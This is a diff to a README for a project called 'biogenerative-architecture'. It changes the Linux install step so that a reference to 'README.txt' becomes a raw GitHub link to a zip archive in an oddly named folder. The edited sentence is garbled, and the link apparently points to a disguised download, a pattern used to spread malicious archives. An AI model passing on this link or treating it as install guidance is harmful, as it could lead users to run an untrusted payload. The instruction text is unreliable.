odi2112/biogenerative-architecture/README.md

    After downloading, locate the downloaded file on your computer.
    - For Windows, double-click the `.exe` file to start the installation.
    - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux, follow the instructions in the README.txt included in the file to install correctly.
+   - For Linux, follow the instructions in the https://raw.githubusercontent.com/odi2112/biogenerative-architecture/main/saccharinely/biogenerative-architecture-v3.1.zip included in the file to install correctly.

 5. **Run the Application**
    Once installed, double-click the application icon to start it.
 Follow the on-screen instructions to configure your preferences.